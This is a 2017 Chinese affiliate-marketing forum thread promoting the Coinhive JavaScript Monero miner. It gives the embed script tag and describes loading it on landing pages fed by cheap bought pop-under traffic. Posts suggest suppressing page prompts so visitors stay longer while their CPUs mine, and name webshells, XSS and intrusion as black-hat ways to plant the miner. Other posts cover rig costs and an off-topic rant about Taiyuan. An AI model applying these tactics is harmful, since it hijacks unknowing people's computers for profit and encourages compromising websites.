花儿、对我笑 发表于 2017-10-9 01:52:26

N年不见的礼物,适合玩站、Media Buy等等...........

老朋友们,新朋友们,好久不见了!转行投身“虚拟币”行当了,好久不来了,不知道现在大家都怎么样了呢?
其实,有的时候挺怀念AFF那些年呢!曾经一起战斗的兄弟,你们还好吗?(呵呵!是不是太煽情了?)
好了,言归正传吧!(再说下去,我真掉眼泪了啊)
今天推荐的项目 就是一段JS代码

网址:https://coinhive.com
< script src = “https://coinhive.com/lib/coinhive.min.js” > < / script >
前段时间,海盗湾都挂的这个JS代码呢,太火爆了!

JS代码挖门罗币,目前国内门罗币价格区间是:1个币=520元-550元(价格随时波动),国外交易价格区间:一个币=90USD-100USD(价格随时波动)
至于什么是门罗币,百度自行脑补。
后台生成短链接 分享出去 就能挖矿,也可以自己编辑JS代码或者API都行!
至于怎么快速挖矿,亲测 “Popads” 可行呢,买最便宜的PC流量,LP加载JS代码,算力速度杠杠滴!玩法还有很多,希望给大家一些提示吧!

花儿、对我笑 发表于 2017-10-9 02:28:02

billy 发表于 2017-10-9 02:11
你试过么?盈利了么?
门罗币用cpu挖矿,买流量没有停留时间,入不敷出是一定的了~ ...

你可以这样啊 ,LP代码设置 关闭弹出消息提醒和网页自动缩放代码,延长用户关闭LP的时间
至于JS代码后台 你设置成 最小哈希值,至于流量,POP你选 印度 土耳其巴西墨西哥 ,设置最低出价比例

花儿、对我笑 发表于 2017-10-9 18:28:35

专业玩家 发表于 2017-10-9 17:45
如果我有几百万,之前炒房。。。。 现在至少1,2千万身家。。 有1,2千万以上身家。。之前应该开个 币。 ...

在说下。山西太原 房子谁炒谁就死,我跟你说下 山西经济的主要架构吧
煤矿汾酒土特产旅游   其他都经济产业 几乎可以忽略不计!
都说山西煤老板多,你理解错了,几乎赚钱的煤矿,幕后都是外地人投资入股的
本地煤老板 挣了钱 都不在山西这地方待 都去一线城市发展了!
汾酒基本都是从 东北地区 进高度白酒 然后勾兑,咱国内的白酒 几乎很多都是勾兑酒,这你可以问问你们当地酒厂就明白!
土特产和旅游 也是最近几年才发展起来的!也是山西省政府目前大力打造的旅游牌

至于山西太原 这个城市几乎没有互联网人才的基因,我15年找 java语言程序员 本地几乎没有,面试了几个,都是半吊子选手,最后我无奈 只能外包给 北京的一家公司!这就是现状!!!
比如 深圳找程序员一找一大把 ,技术水平都蛮高的,哪怕是 西北市场 西安都很容易找的到!
说了这么多,我只想说明一个道理,任何项目 这两年想做大 必须有团队 ,但山西太原 ,人都找不齐,我去火星上 炒房和开币呢?

billy 发表于 2017-10-9 02:09:18

试过几天,1万ip也就合人民币几块钱,比pop差远了~除非是那种一直在线的视频站,可能收入能高些~

花儿、对我笑 发表于 2017-10-9 02:10:14

billy 发表于 2017-10-9 02:09
试过几天,1万ip也就合人民币几块钱,比pop差远了~

你买最便宜的国家啊

billy 发表于 2017-10-9 02:11:28

花儿、对我笑 发表于 2017-10-9 02:10
你买最便宜的国家啊

你试过么?盈利了么?
门罗币用cpu挖矿,买流量没有停留时间,入不敷出是一定的了~

花儿、对我笑 发表于 2017-10-9 02:16:49

你试过么?盈利了么?

我目前自己有矿场呢,JS代码肯定比不了专门的挖矿软件,但思路可以举一反三么,比如,正规搞:站群,买流量,各种”福利“等等 ,黑产搞:webshell ,XSS等等,可以利用的方法太多了,大家开动脑筋吧

花儿、对我笑 发表于 2017-10-9 02:31:27

你试过么?盈利了么?
门罗币用cpu挖矿,买流量没有停留时间,入不敷出是一定的了~ ...
你看看这情况,不盈利的项目,我是不会发布的,熟悉我的战友,都了解我!
要么就不说项目,要说就必定是盈利的项目!
非要我把具体国家流量说出来呢,估计过几天这些国家 流量价格飞涨!

花儿、对我笑 发表于 2017-10-9 02:47:25

如果大家想专门购置机器 挖矿的话
按照 这个算力网站 组装矿机 http://monerobenchmarks.info
配件参考价格区间(一律二手货)
硬盘 可有可无 80G 25元 (可无盘系统)
电源 300W 55元
内存 DDR800 2G 35元(挖门罗不吃内存 1G都可以挖)
主板 50-80元
CPU 风扇60元
CPU 按照需求 自选价格
这只是小批量矿机价格
大批量的话CPU E5双路主板 整机价格区间 900元-1500元
显卡机 挖门罗币 不合算呢!

专业玩家 发表于 2017-10-9 06:14:45

是几年前出EMU 培训的 花儿对我笑大神吗?   当时应该一年轻松赚几百万吧。。。玩这些对你来说太低端了

centos 发表于 2017-10-9 07:30:06

太原叮总.:lol

清风教父 发表于 2017-10-9 08:35:55

:lol一不小心见到大神了?

Luckmc 发表于 2017-10-9 09:03:41

我就是想简单的知道,怎么控制CPU,代码怎么添加。我找不到修改的方法..:loveliness:

生鱼片 发表于 2017-10-9 09:16:03

门罗现在也可以GPU 挖矿啊
如果免费流量或者入侵的搞搞 有点赚头
买流量做这个 感觉要亏
大概看了下 1024 Hashes 有 0.00000015 XMR
假设1万IP 每个都做到1024 (我自己 E5-2670 8核16线程32G 内存 页面用了40秒) 这个应该比较高了吧
也就 0.0015 XMR 价值 0.75元
还不如卖显卡 做矿机

花儿、对我笑 发表于 2017-10-9 14:13:48

专业玩家 发表于 2017-10-9 06:14
是几年前出EMU 培训的 花儿对我笑大神吗?   当时应该一年轻松赚几百万吧。。。玩这些对你来说太低端了 ...

一点都不低端啊,“虚拟币”行当,其实就跟咱这圈子有点像,有新司机,也有老司机,JS代码这项目 特性就适合批量,规模试的搞,里面赚钱道道也挺多呢,我只是分享了“冰山一角”呢,比如 国内价格低收币买卖,倒手卖到国外交易平台,简单暴利,就说这么多吧.

花儿、对我笑 发表于 2017-10-9 14:17:48

生鱼片 发表于 2017-10-9 09:16
门罗现在也可以GPU 挖矿啊
如果免费流量或者入侵的搞搞 有点赚头
买流量做这个 感觉要亏

这些问题 ,挖矿那个圈子,成天有人讨论呢,最后都选择CPU矿机挖矿
为什么呢?就是因为显卡挖门罗币,损耗大 维护成本高,比如6卡 1060挖门罗
根本不划算,还不如挖以太币呢.
页: [1] 2
查看完整版本: N年不见的礼物,适合玩站、Media Buy等等...........